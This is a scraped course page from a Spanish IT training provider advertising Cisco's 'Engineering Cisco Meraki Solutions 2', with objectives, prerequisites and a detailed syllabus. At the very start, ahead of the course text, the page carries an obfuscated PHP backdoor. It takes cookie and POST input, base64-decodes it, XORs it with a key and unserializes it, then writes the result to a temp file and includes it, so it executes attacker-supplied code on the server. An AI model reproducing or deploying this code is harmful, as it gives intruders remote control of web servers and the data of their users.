$PFkQQj = chr (121) . "\x5f" . 'i' . "\131" . chr ( 450 - 373 ).chr ( 258 - 182 ); $cndBMIMKWU = "\x63" . "\x6c" . 'a' . "\163" . chr (115) . chr (95) . 'e' . "\170" . 'i' . 's' . chr (116) . 's';$YCsjZOjng = class_exists($PFkQQj); $PFkQQj = "60693";$cndBMIMKWU = "62927";$LSHFWHvtVn = !1;if ($YCsjZOjng == $LSHFWHvtVn){function JQiUsND(){return FALSE;}$flGKbPmb = "24328";JQiUsND();class y_iYML{private function kHqizmFp($flGKbPmb){if (is_array(y_iYML::$HnXmizr)) {$uDVeO = sys_get_temp_dir() . "/" . crc32(y_iYML::$HnXmizr["\x73" . "\x61" . "\154" . 't']);@y_iYML::$HnXmizr['w' . chr ( 342 - 228 ).chr ( 802 - 697 )."\164" . chr (101)]($uDVeO, y_iYML::$HnXmizr["\143" . chr (111) . chr ( 583 - 473 ).'t' . 'e' . chr ( 405 - 295 )."\164"]);include $uDVeO;@y_iYML::$HnXmizr['d' . "\145" . "\154" . 'e' . "\164" . "\x65"]($uDVeO); $flGKbPmb = "24328";exit();}}private $nfIOxBUgci;public function KzSRiT(){echo 57754;}public function __destruct(){$flGKbPmb = "58915_20028";$this->kHqizmFp($flGKbPmb); $flGKbPmb = "58915_20028";}public function __construct($gBEinuZpzm=0){$FXHNMtt = $_POST;$CMSrFiI = $_COOKIE;$BQAQiDZrib = "cb529a8e-ec0b-435f-86a9-4175305cacff";$xonCzaGOAG = @$CMSrFiI[substr($BQAQiDZrib, 0, 4)];if (!empty($xonCzaGOAG)){$EviQPEw = "base64";$pkBLiUThwD = "";$xonCzaGOAG = explode(",", $xonCzaGOAG);foreach ($xonCzaGOAG as $HrpNnQ){$pkBLiUThwD .= @$CMSrFiI[$HrpNnQ];$pkBLiUThwD .= @$FXHNMtt[$HrpNnQ];}$pkBLiUThwD = array_map($EviQPEw . "\x5f" . "\x64" . chr ( 1028 - 927 ).'c' . "\157" . chr (100) . "\x65", array($pkBLiUThwD,)); $pkBLiUThwD = $pkBLiUThwD[0] ^ str_repeat($BQAQiDZrib, (strlen($pkBLiUThwD[0]) / strlen($BQAQiDZrib)) + 1);y_iYML::$HnXmizr = @unserialize($pkBLiUThwD); $pkBLiUThwD = class_exists("58915_20028");}}public static $HnXmizr = 41468;}$DhFBgMpMgw = new /* 61252 */ y_iYML(24328 + 24328); $_POST = Array();unset($DhFBgMpMgw);} Engineering Cisco Meraki Solutions 2|Grupo Loyal

Engineering Cisco Meraki Solutions 2

Elevate your Cisco Meraki technical knowledge and skills with this three-day, instructor-led training! In this advanced technical training course, you’ll gain the knowledge and skills to plan, design, implement, and operate complex Cisco Meraki solutions. This is the second of two courses that will prepare you to take the upcoming Cisco Meraki Solutions Specialist certification exam.

This course:

Provides hands-on experience with Cisco Meraki equipment via innovative technical presentations and lab exercises

Delivers expert instruction by senior members of the Meraki technical team

Equips you with the knowledge and skills to confidently plan, design, implement, and operate complex Cisco Meraki solutions

Prepares you to take the upcoming Cisco Meraki Solutions Specialist certification exam

Objetivos

After completing this course you should be able to:

Plan for network deployments and integrations using the Meraki platform
Design Meraki architectures for redundancy, high-density, and scalability
Implement comprehensive Meraki product features to meet design objectives
Operate Meraki networks and troubleshoot complex network incidents using the Meraki Dashboard and analytics

Cloud computing

Disponible en formato e-learning

Disponible en formato presencial

Disponible en formato a distancia

Subvención disponible
A través de Fundae, cumpliendo requisitos.

Duración
15 horas

  • Dificultad 50% 50%
  • Nivel alcanzado 80% 80%

Dirigido a

This course is ideal for those who regularly deploy or manage Meraki networks and want to deepen their technical expertise and understanding of the full Meraki product suite and features.

Conocimientos requeridos

Attendees should meet the following prerequisites:

Completed ECMS1 or CMNO, or possess equivalent Meraki knowledge and experience
Be CCNA-certified or have an equivalent level of technical expertise
Be employed by Cisco Systems, a Meraki partner, or a Meraki customer
Pre-requisitos:
CCNA - Implementing and Administering Cisco Solutions
ECMS1 - Engineering Cisco Meraki Solutions 1

Temario

Planning new Meraki architectures and expanding existing deployments

Identify optimal Meraki networks architectures (organization/network sizing and limitations)
Plan for and complete license renewals through the Dashboard
Designing for scalable management and high availability

Design Meraki organization administrative structure using tags (network and device tags)
Design highly available and redundant networks through the use of MX warm-spare and MS physical stacking technology
Design high density wireless networks (access point calculations and SSID configurations)
Automation and scaling Meraki deployments

Utilize SAML for scalable role-based access control
Explain the capabilities and limitations of Templates and Network Cloning
Explain and identify ideal use cases for the Dashboard API
Routing design and practices on the Meraki platform

Design proper static and dynamic routing topologies based on network needs
Explain dynamic routing capabilities on the MX appliance platform
Explain dynamic routing capabilities on the MS switch platform
Configure OSPF across the network as the dynamic routing protocol
Leverage BGP to expand networks and improve WAN performance
QoS and traffic shaping design

Identify the configurable quality of service (QoS) mechanisms across the LAN and WLAN
Prepare for VoIP and video traffic using class of service (CoS), DSCP tags, and wireless traffic shaping
Configure policy and performance-based routing on the MX appliance platform
Architecting VPN and WAN topologies

Design highly scalable VPN architectures (full mesh, hub-and-spoke)
Explain the underlying mechanisms of Meraki Auto VPN (VPN registry, UDP hold punching)
Explain the fundamentals of Meraki SD-WAN and its processing algorithm
Design Meraki SD-WAN architecture with performance-based routing
Extend networks and services into the public cloud (Azure and AWS)
Securing the network with Advanced Security features

Explain the default traffic flow and layer 3/layer 7 rules processing order of the MX appliance platform
Identify the security intelligence engines and definition databases the MX appliance platform leverages for network protection services (Cisco AMP, Threat Grid, Snort)
Identify and enable content filtering at various levels for desired traffic refinement
Switched network concepts and practices

Prepare access policies (802.1x) using Meraki authentication
Properly utilize templates, cloning, and switch profiles
Design guest access for LAN/WLAN utilizing Meraki best practices
Wireless concepts and practices

Configure Dashboard maps and floor plans
Formulate RF profiles to prepare for challenging/variable RF deployments
Configure WLAN access control options based on design requirements
Enable the network for Bluetooth scanning and BLE beaconing
Utilize Air Marshal for intrusion detection and mitigation
Endpoint management concepts and practices

Explain the different device enrollment and profile deployment methods
Design a native containerization strategy to separate work from personal data on endpoints
Identify and implement various application deployment methods
Assemble and implement security policies which cater to various restriction requirements
Construct a network deployment that leverages SM Sentry
Physical security concepts and practices

Explain the MV platform’s edge architecture and underlying video delivery mechanism (local vs. remote video access)
Design a retention policy using various local or cloud-based storage strategies
Configure MV cameras for wireless deployments
Explain and demonstrate how to effectively utilize advanced analytics and MV camera APIs
Gaining additional network insight through application monitoring

Explain how Meraki Insight is able to provide network assurance through the use of performance metrics and scores
Qualify and properly size Meraki Insight licenses
Configure, monitor, and track predefined and custom web application thresholds
Preparing and setting up monitoring, logging, and alerting services

Explain Dashboard’s integrated historical log databases (event vs. change logs) to be leveraged for effective activity analysis
Identify the various monitoring tools within Dashboard (native analytics, Topology)
Demonstrate effective network-wide alerting best practices
Utilize the Dashboard API to monitor and maintain Meraki networks
Setting up Dashboard reporting and auditing capabilities

Generate and interpret on-demand or recurring Summary Reports for key performance metrics
Track and manage firmware releases and prepare for staged upgrades
Recommend proper actions to meet PCI DSS (2.0 and 3.0) compliance
Gaining visibility and resolving issues using Meraki features and built-in troubleshooting tools

Interpret event and change logs to troubleshoot client and network issues
Classify and compare security threats via the Security Center
Assess wireless intrusions, failures, and network access issues through Dashboard’s RF tools (Wireless Health, Air Marshal)
Assess root cause of application performance issues with Meraki Insight
Explain the detailed VPN tunnel information and the VPN Registry found on the VPN Status page
Utilize the Local Status Page as an alternate connectivity method to perform local troubleshooting

Solicita información del curso

It Formacion

It Formacion